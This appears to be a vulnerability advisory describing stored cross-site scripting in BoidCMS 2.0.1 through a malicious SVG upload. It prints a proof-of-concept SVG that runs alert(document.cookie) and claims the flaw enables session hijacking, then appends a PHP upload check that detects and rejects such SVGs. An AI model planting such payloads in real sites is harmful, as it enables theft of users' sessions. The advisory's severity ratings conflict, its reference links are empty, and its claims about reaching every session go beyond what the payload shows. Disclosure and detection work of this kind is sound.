BoidCMS-2.0.1 - FileUpload - RCE - PHPSESSID HIJACKING

Risk: Medium
Local: Yes
Remote: Yes

## Title: BoidCMS-2.0.1 - FileUpload - RCE - PHPSESSID HIJACKING

## Author: nu11secur1ty

## Date: 10/13/2023

## Vendor:

## Software:

## Reference:

## LAB:

## Description:
This attack needs two attackers to be complete. The first one has credentials and uses them to upload a malicious SVG file. When he is done, he simply quits the application and sends the malicious URL to the second attacker. With this URL, the second attacker can access EVERY session of EVERY user of this system. This stops only when the real admin finds the malicious file, but by then it will be too late for all users of this system. This attack is called TMITM - Two men in the middle!

STATUS: HIGH - Vulnerability

[+]Exploit:

```svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "">
<svg version="1.1" baseProfile="full" xmlns="">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.cookie);
  </script>
</svg>
```

## Reproduce:
[href](

## Proof and Exploit:
[href](

## Time spent:
01:37:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at and
0day Exploit DataBase
home page:
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <>
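One way an upload handler could refuse SVG files like the one above, as an added example that is not code from the advisory or from BoidCMS. `svg_active_content()` is a hypothetical helper name, and the sample input is constructed from the payload shape shown in the advisory.

```php
<?php
// Added example, not BoidCMS code. svg_active_content() is a hypothetical
// helper an upload handler could call before it stores an .svg file.
function svg_active_content(string $svg): array
{
    if (trim($svg) === '') {
        return ['empty file'];
    }
    $doc = new DOMDocument();
    $prev = libxml_use_internal_errors(true);
    // LIBXML_NONET forbids network fetches. LIBXML_NOENT and LIBXML_DTDLOAD
    // are deliberately not passed, so entities and external DTDs stay inert.
    $ok = $doc->loadXML($svg, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    if (!$ok) {
        return ['not well-formed XML'];
    }
    $blocked = ['script', 'foreignobject', 'iframe', 'embed', 'object'];
    $findings = [];
    foreach ($doc->getElementsByTagName('*') as $el) {
        $name = strtolower($el->localName);
        if (in_array($name, $blocked, true)) {
            $findings[] = "element <$name>";
        }
        foreach ($el->attributes as $attr) {
            $an = strtolower($attr->localName);
            // Browsers ignore whitespace/control bytes inside a URL scheme.
            $av = strtolower((string) preg_replace('/[\x00-\x20]+/', '', $attr->value));
            if (strncmp($an, 'on', 2) === 0) {
                $findings[] = "event handler $an on <$name>";
            } elseif ($an === 'href' && strncmp($av, 'javascript:', 11) === 0) {
                $findings[] = "javascript: URL on <$name>";
            }
        }
    }
    return $findings;
}

// Constructed sample: the payload shape from the advisory above.
$sample = <<<'SVG'
<svg version="1.1" baseProfile="full">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"/>
  <script type="text/javascript">alert(document.cookie);</script>
</svg>
SVG;
$findings = svg_active_content($sample);
echo $findings ? 'REJECT: ' . implode('; ', $findings) : 'ACCEPT', PHP_EOL;
```

This is a reject-on-detection check, not a full sanitizer, so uploaded files should also be served with `Content-Disposition: attachment` or a restrictive `Content-Security-Policy`. Marking the session cookie `HttpOnly` keeps `document.cookie` from exposing PHPSESSID to a script that does get through.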
